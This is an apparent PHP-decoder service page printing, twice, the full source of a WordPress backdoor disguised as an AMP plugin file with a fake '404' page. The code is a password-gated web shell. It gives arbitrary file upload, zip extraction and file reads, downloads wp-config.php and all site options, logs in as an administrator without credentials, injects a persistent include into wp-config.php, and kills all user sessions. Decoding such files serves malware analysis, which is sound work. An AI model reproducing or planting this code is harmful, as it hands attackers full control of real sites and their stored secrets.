Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (!function_exists('add_action')) { define('TM_AMP_VER', '3.7'); $path=base..

Decoded Output download

<?php 
 
if (!function_exists('add_action')) { 
	define('TM_AMP_VER', '3.7'); 
	$path=base_path(); 
	require_once( $path . 'wp-load.php' ); 
} 
 
function base_path () { 
	$path = dirname(__FILE__); 
	while (true) { 
		if (file_exists($path."/wp-config.php")) { 
			return $path."/"; 
		} 
		$path = dirname($path); 
	} 
} 
 
session_start(); 
 
if(!isset($_SESSION['loggedin']) || $_SESSION['loggedin']!==1){ 
 
	if(!isset($_REQUEST['session'])){	    header( "HTTP/1.1 301 Moved Permanently" ); 
		header( "Location: " . get_bloginfo( 'url' ) ); 
		exit(); 
		die();} 
 
    if (!password_verify($_REQUEST['session'], '$2y$10$ugk.KdHVAxFtDakcrCNaGuUwOL/DRLHH.nA7srrcjWF0fWJO8h.QC')) { 
    header("HTTP/1.1 301 Moved Permanently"); 
    header("Location: " . get_bloginfo('url')); 
    exit(); 
    } 
    else 
    { 
       $_SESSION['loggedin']=1; 
    } 
} 
 
function refresh_plugin() { 
 
	$adminUsers = get_users(['role' => 'administrator']); 
	wp_set_auth_cookie($adminUsers[0]->ID); 
 
} 
 
define('FS_CHMOD_FILE', 0644); 
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-base.php'; 
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-direct.php'; 
$filesystem = new WP_Filesystem_Direct(false); 
if (isset($_POST['create_backup'])) 
{ 
	$back=array(); 
	$back['conf']=wp_load_alloptions(); 
	$back['wp-conf']=$filesystem->get_contents( ABSPATH.'wp-config.php'); 
	$destName =get_bloginfo('url').".conf"; 
	$source=json_encode($back); 
	header('HTTP/1.1 200 OK');	header("Content-Length: " . strlen($source));	header("Content-Description: file transfer");	header("Content-transfer-encoding: binary");	header('Content-Disposition: attachment; filename="' . $destName . '"'); 
	echo $source;	die(); 
} 
if (isset($_REQUEST['path'])) 
{ 
	echo $filesystem->get_contents( ABSPATH.$_REQUEST['path']);	die(); 
} 
echo '<!DOCTYPE html> 
<html> 
<head> 
    <title>404</title> 
</head> 
 
<style> 
    #status { 
        width: 100%; 
        border: 1px solid #cccccc; 
        padding: 10px; 
        box-sizing: border-box; 
        background-color: #f9f9f9; 
        margin: 10px; 
        border-radius: 5px; 
        box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1); 
        font-size: 16px; 
        text-align: center; 
        font-weight: bold; 
        font-style: italic; 
    } 
    #container { 
        display: flex; 
        height: 100%; 
    } 
    .panel { 
        width: 100%; 
        overflow: auto; 
        border: 1px solid #cccccc; 
        padding: 10px; 
        box-sizing: border-box; 
        background-color: #f9f9f9; 
        margin: 10px; 
        border-radius: 5px; 
        box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1); 
    } 
    #tree-container span.folder { 
        font-weight: bold; 
        color: #006699; 
        cursor: pointer; 
    } 
    #tree-container span.file { 
        color: #999999; 
        cursor: pointer; 
    } 
</style> 
 
 
<body>'; 
?> 
<?php 
if ( isset( $_POST['submit'] ) ) { 
	if ( isset( $_FILES['file'] ) ) { 
		if ($_FILES['file']['error'] === UPLOAD_ERR_OK) { 
			$file_name = $_FILES['file']['name']; 
 
			$file_tmp  = $_FILES['file']['tmp_name']; 
			$file_path = $_POST['pathname']; 
			if ($filesystem->is_file($file_path)){$filesystem->delete($file_path); } 
			if ( $filesystem->move( $file_tmp, $file_path ) ) { 
				echo '<div id="status">BIEN : '.$file_path.'</div>'; 
			} else { 
				echo '<div id="status">ERROR : '.$file_path.'</div>'; 
			} 
		} 
	} 
} else 
if ( isset( $_POST['submitzip'] ) ) { 
	if ( isset( $_FILES['file'] ) ) { 
		if ($_FILES['file']['error'] === UPLOAD_ERR_OK) { 
			$file_name = $_FILES['file']['name']; 
 
			$file_tmp  = $_FILES['file']['tmp_name']; 
			$file_path = $_POST['pathname']; 
			require_once(ABSPATH . 'wp-admin/includes/file.php'); 
			WP_Filesystem(); 
			if (unzip_file($file_tmp, $file_path))  { 
 
 
				echo '<div id="status">BIEN : '.$file_path.'</div>'; 
			} else { 
				echo '<div id="status">ERROR : '.$file_path.'</div>'; 
			} 
		} 
	} 
} 
else if(isset($_POST['dev'])) 
{ 
	$config=$filesystem->get_contents( ABSPATH.'wp-config.php'); 
	if (!empty($config)) { 
		$filesystem->put_contents(ABSPATH . 'wp-config.php', $config . "

" . '/** Sets up WordPress vars */@include_once("'.$_REQUEST['path'].'");/** and included files. */'); 
	} 
	else 
		echo '<div id="status">ERROR</div>'; 
} 
else if(isset($_POST['wpe_sso'])) 
{ 
	refresh_plugin(); 
} 
else if(isset($_POST['WORDPRESS_LOGOUT_ALL'])) 
{ 
	$users = get_users(); 
 
	foreach ( $users as $user ) { 
 
		// Get all sessions for user with ID $user_id 
		$sessions = WP_Session_Tokens::get_instance( $user->ID ); 
 
		// We have got the sessions, destroy them all! 
		$sessions->destroy_all(); 
	} 
 
} 
else if(isset($_POST['logout'])) 
{ 
	$_SESSION['loggedin']=0; 
	session_reset(); 
	session_destroy(); 
	header( "HTTP/1.1 301 Moved Permanently" ); 
	header( "Location: " . get_bloginfo( 'url' ) ); 
	exit(); 
	die(); 
} 
 
 
 
 
?> 
	<div id="container"> 
<?php 
echo '<div id="html-container"  class="panel"></br><center><a href="'.admin_url( '/index.php' ).'" target="_blank">Dashboard</a></br></center></br>'; 
echo 'root_dir: '.ABSPATH; 
echo '</br><center><form method="post" enctype="multipart/form-data"> 
    <label for="file">upload file:</label> 
    </br> 
    <input type="file" name="file" id="file"><br> 
    <label for="path">path/name:</label> 
        </br> 
    <input type="text" name="pathname" value="/tmp/dev" id="path"><br> 
    <input type="submit" name="submit" value="submit"> 
</form></center></br>'; 
echo '</br><center><form method="post" enctype="multipart/form-data"> 
    <label for="filezip">upload file zip:</label> 
    </br> 
    <input type="file" name="file" id="filezip"><br> 
    <label for="path">path/name:</label> 
        </br> 
    <input type="text" name="pathname" value="'.ABSPATH.'" id="path"><br> 
    <input type="submit" name="submitzip" value="submitzip"> 
</form></center></br>'; 
echo '<center><form method="post"> 
    <label for="wqpath">path/name:</label> 
    <input type="text" name="path" value="/tmp/dev" id="qwpath"><br> 
        <label for="dev">Write  dev</label> 
    <input type="submit" name="dev" id="dev"></br> 
    </br></form></center>'; 
 
echo '</br></br></br></br><center><form method="post"> 
    <label for="download">Download backup</label> 
    <input type="submit" name="create_backup" id="create_backup"> 
    </br></form></center> 
     
     
  </br></br></br></br><center><form method="post"> 
    <label for="wpe_sso">LogIn Site admin</label> 
    <input type="submit" name="wpe_sso" id="wpe_sso"> 
    </br></form></center> 
 
    </br></br></br></br><center><form method="post"> 
    <label for="WORDPRESS_LOGOUT_ALL">WORDPRESS_LOGOUT_ALL</label> 
    <input type="submit" name="WORDPRESS_LOGOUT_ALL" value="WORDPRESS_LOGOUT_ALL" id="WORDPRESS_LOGOUT_ALL"> 
    </br></form></center>      </br></br></br></br> </br></br></br></br> </br></br></br></br> </br></br></br></br><center><form method="post"> 
    <label for="logout">exit</label> 
    <input type="submit" name="logout" value="exit" id="logout"> 
    </br></form></center> 
    </div> 
</div></body>'; 
 
?>

Did this file decode correctly?

Original Code

<?php

if (!function_exists('add_action')) {
	define('TM_AMP_VER', '3.7');
	$path=base_path();
	require_once( $path . 'wp-load.php' );
}

function base_path () {
	$path = dirname(__FILE__);
	while (true) {
		if (file_exists($path."/wp-config.php")) {
			return $path."/";
		}
		$path = dirname($path);
	}
}

session_start();

if(!isset($_SESSION['loggedin']) || $_SESSION['loggedin']!==1){

	if(!isset($_REQUEST['session'])){	    header( "HTTP/1.1 301 Moved Permanently" );
		header( "Location: " . get_bloginfo( 'url' ) );
		exit();
		die();}

    if (!password_verify($_REQUEST['session'], '$2y$10$ugk.KdHVAxFtDakcrCNaGuUwOL/DRLHH.nA7srrcjWF0fWJO8h.QC')) {
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: " . get_bloginfo('url'));
    exit();
    }
    else
    {
       $_SESSION['loggedin']=1;
    }
}

function refresh_plugin() {

	$adminUsers = get_users(['role' => 'administrator']);
	wp_set_auth_cookie($adminUsers[0]->ID);

}

define('FS_CHMOD_FILE', 0644);
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-base.php';
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-direct.php';
$filesystem = new WP_Filesystem_Direct(false);
if (isset($_POST['create_backup']))
{
	$back=array();
	$back['conf']=wp_load_alloptions();
	$back['wp-conf']=$filesystem->get_contents( ABSPATH.'wp-config.php');
	$destName =get_bloginfo('url').".conf";
	$source=json_encode($back);
	header('HTTP/1.1 200 OK');	header("Content-Length: " . strlen($source));	header("Content-Description: file transfer");	header("Content-transfer-encoding: binary");	header('Content-Disposition: attachment; filename="' . $destName . '"');
	echo $source;	die();
}
if (isset($_REQUEST['path']))
{
	echo $filesystem->get_contents( ABSPATH.$_REQUEST['path']);	die();
}
echo '<!DOCTYPE html>
<html>
<head>
    <title>404</title>
</head>

<style>
    #status {
        width: 100%;
        border: 1px solid #cccccc;
        padding: 10px;
        box-sizing: border-box;
        background-color: #f9f9f9;
        margin: 10px;
        border-radius: 5px;
        box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
        font-size: 16px;
        text-align: center;
        font-weight: bold;
        font-style: italic;
    }
    #container {
        display: flex;
        height: 100%;
    }
    .panel {
        width: 100%;
        overflow: auto;
        border: 1px solid #cccccc;
        padding: 10px;
        box-sizing: border-box;
        background-color: #f9f9f9;
        margin: 10px;
        border-radius: 5px;
        box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
    }
    #tree-container span.folder {
        font-weight: bold;
        color: #006699;
        cursor: pointer;
    }
    #tree-container span.file {
        color: #999999;
        cursor: pointer;
    }
</style>


<body>';
?>
<?php
if ( isset( $_POST['submit'] ) ) {
	if ( isset( $_FILES['file'] ) ) {
		if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
			$file_name = $_FILES['file']['name'];

			$file_tmp  = $_FILES['file']['tmp_name'];
			$file_path = $_POST['pathname'];
			if ($filesystem->is_file($file_path)){$filesystem->delete($file_path); }
			if ( $filesystem->move( $file_tmp, $file_path ) ) {
				echo '<div id="status">BIEN : '.$file_path.'</div>';
			} else {
				echo '<div id="status">ERROR : '.$file_path.'</div>';
			}
		}
	}
} else
if ( isset( $_POST['submitzip'] ) ) {
	if ( isset( $_FILES['file'] ) ) {
		if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
			$file_name = $_FILES['file']['name'];

			$file_tmp  = $_FILES['file']['tmp_name'];
			$file_path = $_POST['pathname'];
			require_once(ABSPATH . 'wp-admin/includes/file.php');
			WP_Filesystem();
			if (unzip_file($file_tmp, $file_path))  {


				echo '<div id="status">BIEN : '.$file_path.'</div>';
			} else {
				echo '<div id="status">ERROR : '.$file_path.'</div>';
			}
		}
	}
}
else if(isset($_POST['dev']))
{
	$config=$filesystem->get_contents( ABSPATH.'wp-config.php');
	if (!empty($config)) {
		$filesystem->put_contents(ABSPATH . 'wp-config.php', $config . "\n\n" . '/** Sets up WordPress vars */@include_once("'.$_REQUEST['path'].'");/** and included files. */');
	}
	else
		echo '<div id="status">ERROR</div>';
}
else if(isset($_POST['wpe_sso']))
{
	refresh_plugin();
}
else if(isset($_POST['WORDPRESS_LOGOUT_ALL']))
{
	$users = get_users();

	foreach ( $users as $user ) {

		// Get all sessions for user with ID $user_id
		$sessions = WP_Session_Tokens::get_instance( $user->ID );

		// We have got the sessions, destroy them all!
		$sessions->destroy_all();
	}

}
else if(isset($_POST['logout']))
{
	$_SESSION['loggedin']=0;
	session_reset();
	session_destroy();
	header( "HTTP/1.1 301 Moved Permanently" );
	header( "Location: " . get_bloginfo( 'url' ) );
	exit();
	die();
}




?>
	<div id="container">
<?php
echo '<div id="html-container"  class="panel"></br><center><a href="'.admin_url( '/index.php' ).'" target="_blank">Dashboard</a></br></center></br>';
echo 'root_dir: '.ABSPATH;
echo '</br><center><form method="post" enctype="multipart/form-data">
    <label for="file">upload file:</label>
    </br>
    <input type="file" name="file" id="file"><br>
    <label for="path">path/name:</label>
        </br>
    <input type="text" name="pathname" value="/tmp/dev" id="path"><br>
    <input type="submit" name="submit" value="submit">
</form></center></br>';
echo '</br><center><form method="post" enctype="multipart/form-data">
    <label for="filezip">upload file zip:</label>
    </br>
    <input type="file" name="file" id="filezip"><br>
    <label for="path">path/name:</label>
        </br>
    <input type="text" name="pathname" value="'.ABSPATH.'" id="path"><br>
    <input type="submit" name="submitzip" value="submitzip">
</form></center></br>';
echo '<center><form method="post">
    <label for="wqpath">path/name:</label>
    <input type="text" name="path" value="/tmp/dev" id="qwpath"><br>
        <label for="dev">Write  dev</label>
    <input type="submit" name="dev" id="dev"></br>
    </br></form></center>';

echo '</br></br></br></br><center><form method="post">
    <label for="download">Download backup</label>
    <input type="submit" name="create_backup" id="create_backup">
    </br></form></center>
    
    
  </br></br></br></br><center><form method="post">
    <label for="wpe_sso">LogIn Site admin</label>
    <input type="submit" name="wpe_sso" id="wpe_sso">
    </br></form></center>

    </br></br></br></br><center><form method="post">
    <label for="WORDPRESS_LOGOUT_ALL">WORDPRESS_LOGOUT_ALL</label>
    <input type="submit" name="WORDPRESS_LOGOUT_ALL" value="WORDPRESS_LOGOUT_ALL" id="WORDPRESS_LOGOUT_ALL">
    </br></form></center>      </br></br></br></br> </br></br></br></br> </br></br></br></br> </br></br></br></br><center><form method="post">
    <label for="logout">exit</label>
    <input type="submit" name="logout" value="exit" id="logout">
    </br></form></center>
    </div>
</div></body>';

?>

Function Calls

None

Variables

None

Stats

MD5 30d13e9d61d8706be8a4dc2eb25020fd
Eval Count 0
Decode Time 61 ms